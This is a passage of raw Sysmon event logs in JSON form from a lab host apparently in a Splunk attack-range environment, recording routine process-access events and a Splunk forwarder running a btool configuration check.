Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3788,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.168\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010639E0500}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.168","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010639E0500}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3789,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nProcessGuid: {E2A3D6B1-1106-5F25-0000-0010BEA10500}\r\nProcessId: 5008\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nParentProcessId: 3828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","ProcessGuid":"{E2A3D6B1-1106-5F25-0000-0010BEA10500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","ParentProcessId":"3828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3790,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nSourceProcessId: 3828\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-0010BEA10500}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","SourceProcessId":"3828","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-0010BEA10500}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3791,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-0010BEA10500}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-0010BEA10500}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3792,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3793,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3794,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3795,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3796,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 